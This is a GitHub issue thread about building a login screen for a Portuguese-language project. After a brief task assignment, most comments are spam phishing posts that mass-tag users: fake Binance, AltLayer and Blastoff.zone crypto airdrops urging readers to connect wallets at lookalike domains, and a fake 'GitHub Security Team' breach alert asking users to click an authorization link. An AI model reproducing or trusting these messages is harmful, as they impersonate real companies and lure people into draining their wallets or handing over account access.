### ISSUE TITLE
Tela: Login

### ISSUE THREAD

**Issue by TobiasGustavo** [TobiasGustavo/ESG#1]
Criar tela conforme prototipo: < https://www.figma.com/file/tj9NEyoRzty4XpIovI0uh5/Untitled?type=design&node-id=0-1&mode=design&t=NVqKJMsLNYy8hNRt-0 >

**Comment by flavialbraz** [comment]
Hey, gente! Alguem pegou essa task? Se nao, posso fazer

**Comment by TobiasGustavo** [comment]
Pode ser @flavialbraz

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @johnvilela, @marcosyonaware, @leogregianin, @silvestreR, @victoriacassolo, @naldorp, @luiscns-alt, @RoParis9, @felipecordeiro, @Zanettis

**Comment by jimgarcia** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

hongwenning, @xpl0it3r, @Neirotciv, @mrfsrf, @arunadaybasu, @sheilahlockmiller, @PuyolPantsDown, @XDM-dev, @wallezen, @DynamicYang, @MahdiCodee, @paolofacchinetti, @jellybelly420, @c1hnrm, @xianghl01, @BittuBabu1, @CryticPun, @weippig, @guipatriota, @aavaldez64

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
samarabdelhameed, @gabriele-del-monte, @Piyushmethi09, @hyperloris, @vsiryxm, @delta4-seeker, @m0ohannad, @anthonychavis, @wisesean, @buithecuong, @AliveIvI, @kmilodenisglez, @mdear, @Autodidaact, @yensen, @xsr, @lemonpooh, @XuZhichao1998, @kapendat, @evanthacker

**Comment by roccozs** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
QuentinLCS, @sunflower003, @quiet-node, @bobzhen, @JawilX, @1inspiration, @sitkevij, @eyeplum, @techieforfun, @MikeTysonCurrency, @billguocs, @freedomcoming, @whuwxl, @its-hmny, @RussQuan, @filjander, @codingbycoding, @iShiSan, @daniel1cloud, @samho223, @leego, @baddddddddd, @txemaromero, @mervintruett, @AHZMASTER, @Stevengre, @brsweeney, @srishilesh, @mizhm, @cc7768, @gangadharjannu, @fenris85, @BiljanaKotev, @shash236, @bmiller59, @akando42, @reaperes, @kantefier, @hubin858130, @tenfinney, @dtjldamien, @mingchuno, @titan-web, @bac2qh, @prongbang, @Jez-Heard-Scale-Genesis, @clr1107, @57-Wolve, @harsh123-baba, @Griffin-Foster

**Comment by vsiryxm** [comment]
请直接在QQ上联系我,谢谢!
